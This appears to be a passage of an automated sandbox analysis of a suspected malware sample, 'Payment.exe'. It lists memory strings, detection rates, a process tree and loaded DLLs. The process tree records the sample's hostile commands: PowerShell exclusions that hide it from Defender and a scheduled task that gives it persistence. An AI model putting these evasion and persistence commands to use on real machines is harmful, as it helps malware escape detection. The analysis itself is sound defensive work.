Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT OR REPLACE INTO branches ( content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, branch_name) SELECT content_item_id, content_item_revision_id, app_id, is_transient, record_created, modified, download_state, :targetBranchname from branches WHERE branch_name = :srcBranchname AND content_item_id = :contentItemId AND app_id = :appId;
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT branches.content_item_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) JOIN content_items ON( content_items.creation_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch1 AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id NOT IN ( SELECT branches.content_item_revision_id FROM content_item_relations JOIN branches ON( branches.content_item_id = content_item_relations.target_content_item_id) WHERE( content_item_relations.src_content_item_id = :srcContentItemId AND content_item_relations.rel = :relType AND branches.app_id = :appId AND branches.branch_name = :branch2))));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_relations ( src_content_item_id TEXT NOT NULL, target_content_item_id TEXT NOT NULL, rel TEXT NOT NULL, PRIMARY KEY (src_content_item_id, target_content_item_id, rel));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO pending_requests( pending_request_id, request_type, content_item_id, context) VALUES( :pendingRequestId, :requestType, :contentItemId, :context);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT *, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = creation_id_local AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload, (SELECT 1 from branches where branch_name = 'conflict' AND content_item_id = creation_id_local) as is_conflicted, ( SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id and branches.content_item_id = creation_id_local) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base'))))) as is_sync_pending FROM ( SELECT content_item_relations.src_content_item_id, branches.download_state, branches.record_created, branches.modified, content_items.creation_id , content_items.creation_id as creation_id_local, branches.content_item_id, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE content_item_revisions SET local_etag = :localEtag, request_id = :requestId, updated = :updated WHERE( content_item_revision_id IN ( SELECT content_item_revision_id FROM branches WHERE( content_item_id = :contentItemId AND branch_name = :branchName ANDapp_id = :appId)));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType and content_item_id = :contentItemId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE device_mappings SET unPinned = 1 WHERE(content_item_id = :contentItemId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS pending_requests ( pending_request_id TEXT PRIMARY KEY NOT NULL, request_type TEXT NOT NULL, content_item_id TEXT DEFAULT NULL, context TEXT DEFAULT NULL, pending_request_created TIMESTAMP DEFAULT (strftime('%Y-%m-%dT%H:%M:%SZ', 'now', 'localtime')) NOT NULL, request_status TEXT DEFAULT "CREATED" NOT NULL, message TEXT DEFAULT NULL, status_code INTEGER DEFAULT -1 NOT NULL, device_mapping_id TEXT DEFAULT NULL, UNIQUE (content_item_id, request_type, request_status));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :assetId AND branches.branch_name = :branchName AND branches.app_id = :appId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT content_items.creation_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'current' AND branches.app_id = :appid) AND ((content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR (content_item_revisions.content_item_revision_id) NOT IN ( SELECT content_item_revisions.content_item_revision_id FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) WHERE (branches.branch_name = 'base' AND branches.app_id = :appid))) AND content_items.creation_id NOT IN ( SELECT content_item_id FROM branches WHERE( branch_name = 'error'));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT creation_id FROM content_items WHERE asset_id = :assetId;
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT * FROM device_mappings WHERE( unPinned = 1);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted, (SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT content_item_revisions.cloud_etag FROM content_items JOIN branches ON (branches.content_item_id = content_items.creation_id)JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id)WHERE( content_items.asset_id = :collectionId AND branches.branch_name = :branchName AND branches.app_id = :appId)) as collection_cloud_etag FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN content_item_rel
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT * FROM device_mappings WHERE( content_item_type = :resourceType);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS content_item_updates ( seq_num INTEGER PRIMARY KEY NOT NULL, app_id TEXT NOT NULL, content_item_local_id TEXT NOT NULL, time TIMESTAMP NOT NULL, operation TEXT NOT NULL);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: UPDATE content_items SET asset_id = :assetId WHERE( creation_id = :creationId);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS device_mappings ( device_mapping_id TEXT PRIMARY KEY NOT NULL, content_item_id TEXT NOT NULL, content_item_type TEXT NOT NULL, include_rel_types TEXT DEFAULT NULL, include_depth INTEGER DEFAULT 0 NOT NULL, branch TEXT DEFAULT NULL, device_mapping_created TIMESTAMP DEFAULT (strftime('%s', 'now')) NOT NULL, collection_id TEXT DEFAULT NULL, TTL INTEGER DEFAULT 0 NOT NULL, Priority INTEGER DEFAULT 0 NOT NULL, app_info TEXT NOT NULL, unPinned INTEGER DEFAULT 0 NOT NULL, UNIQUE (content_item_id, branch));
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests;
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: INSERT INTO resource_content( resource_content_id, resource_content) VALUES ( :resourceContentId, :resourceContent);
Source: AdobeCollabSync.exe.8.dr	Binary or memory string: SELECT *FROM pending_requests WHERE(content_item_id = :contentItemId);
Source: Payment.exe, 00000008.00000002.2150772680.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003F85000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003FAA000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003FB6000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003F76000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C51000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C61000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment.exe	Virustotal: Detection: 41%
Source: Payment.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\Payment.exe

File read: C:\Users\user\Desktop\Payment.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe C:\Users\user\AppData\Roaming\jwBqGZseW.exe
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: unknown	Process created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: unknown	Process created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
Source: unknown	Process created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown	Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process created: C:\Users\user\Desktop\Payment.exe "C:\Users\user\Desktop\Payment.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp401D.tmp"
Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exe	Process created: C:\Users\user\AppData\Roaming\jwBqGZseW.exe "C:\Users\user\AppData\Roaming\jwBqGZseW.exe"

Source: C:\Users\user\Desktop\Payment.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Section loaded: dnsapi.dll	Jump to behavior
